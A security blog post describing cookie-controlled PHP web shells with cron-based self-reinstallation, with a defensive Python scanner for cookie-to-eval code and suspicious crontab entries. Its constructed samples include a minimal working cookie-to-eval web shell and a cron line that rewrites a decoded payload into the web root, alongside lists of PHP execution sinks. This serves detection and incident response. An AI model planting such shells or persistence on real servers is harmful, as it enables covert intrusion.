Brunswick, ME • (207) 245-1010 • contact@johnzblack.com
Microsoft’s Defender team just documented a PHP web shell technique that should bother every Linux web server admin. Attackers issue commands through HTTP cookie values instead of URL parameters or POST bodies. Your WAF probably can’t see it. Your logs look clean.
But the real problem? Delete the shell and it comes back.
Traditional web shells pass commands through URLs or POST data. Security tools have gotten good at catching those. So attackers moved to PHP’s $_COOKIE superglobal. Set a cookie with the command, send a normal-looking request, shell executes whatever’s in the cookie. No suspicious parameters. No weird POST body. Just a cookie that looks like session data.
Microsoft found three variants. One uses layered obfuscation. Another splits commands across multiple cookie values. The third triggers on a single cookie marker. All invisible to most defensive tooling.
Now here’s the nasty part. These shells install cron jobs that monitor for their own removal. Delete the PHP file? Cron recreates it on schedule. You can scrub your web directory top to bottom and the infection regenerates automatically. It’s not sophisticated in concept. Cron is as basic as Linux gets. But it wrecks incident response teams that clean the web root and call it done.
Cleaning a web shell without auditing cron is like mopping the floor while the pipe’s still leaking.
Initial access comes through the usual suspects: stolen credentials and unpatched software. No zero-days needed. Microsoft didn’t attribute this to any specific group, which actually makes it scarier. This tradecraft is available to anyone paying attention.
What to do: Check cron on every Linux web server. Not just compromised ones. Review your WAF rules for cookie inspection. Enforce MFA on hosting panels and SSH. And stop treating web shell cleanup as “find file, delete file, done.” Any remediation that skips persistence mechanisms is incomplete. Period.
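Two of those checks, scripted as an added example (mine, not Microsoft's code and not part of the original post): a light taint scan that flags PHP lines where `$_COOKIE` data reaches an execution sink, directly or through the decode-then-eval layering described above, and a crontab triage that flags jobs writing or decoding into a web root. The sink list, web-root paths, and both samples are assumptions I constructed, not captures from the report.

```python
import re
# Execution sinks a PHP web shell feeds attacker-controlled input into (assumed list).
SINKS = re.compile(r"\b(eval|assert|system|shell_exec|passthru|exec|popen|proc_open)\s*\(")
COOKIE = re.compile(r"\$_COOKIE\s*\[")
ASSIGN = re.compile(r"\s*(\$\w+)\s*=(?!=)(.*)")

def _uses(names: set[str], text: str) -> bool:
    return any(re.search(re.escape(n) + r"\b", text) for n in names)

def php_cookie_sink_hits(src: str) -> list[str]:
    """Lines where $_COOKIE data reaches a sink, directly or via variables
    assigned from it earlier in the file (covers decode-then-eval layering)."""
    tainted: set[str] = set()
    hits = []
    for line in src.splitlines():
        if (m := ASSIGN.match(line)) and (COOKIE.search(m.group(2)) or _uses(tainted, m.group(2))):
            tainted.add(m.group(1))
        if SINKS.search(line) and (COOKIE.search(line) or _uses(tainted, line)):
            hits.append(line.strip())
    return hits

# Web roots are an assumption; extend for your layout. Legitimate deploy jobs
# can match too, so treat the output as a review list, not a verdict.
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx")
WRITERS = re.compile(r"(>|\b(cp|mv|tee|wget|curl)\b)")
DECODERS = re.compile(r"base64\s+(-d|--decode)|\bphp\s+-r\b")

def suspicious_cron_lines(crontab: str) -> list[str]:
    """Cron entries that write/fetch into a web root or decode a payload inline."""
    out = []
    for line in crontab.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if (any(r in s for r in WEB_ROOTS) and WRITERS.search(s)) or DECODERS.search(s):
            out.append(s)
    return out

# Constructed samples (not real captures): a layered cookie shell, and a crontab whose */5 job regenerates it from a placeholder blob.
SAMPLE_PHP = """<?php
$k = base64_decode($_COOKIE['sess']);
$p = str_rot13($k);
if (isset($_COOKIE['m'])) { eval($p); }
"""
SAMPLE_CRON = """# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * echo "$PAYLOAD_B64" | base64 -d > /var/www/html/.cache.php
@reboot /usr/local/bin/backup.sh
"""
```

Run the first function over every PHP file under the web root and the second over /etc/crontab, /etc/cron.d/* and each user's `crontab -l` output; neither replaces comparing the web root against a known-good build.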
How cookie-based C2 and self-healing persistence are changing web shell attacks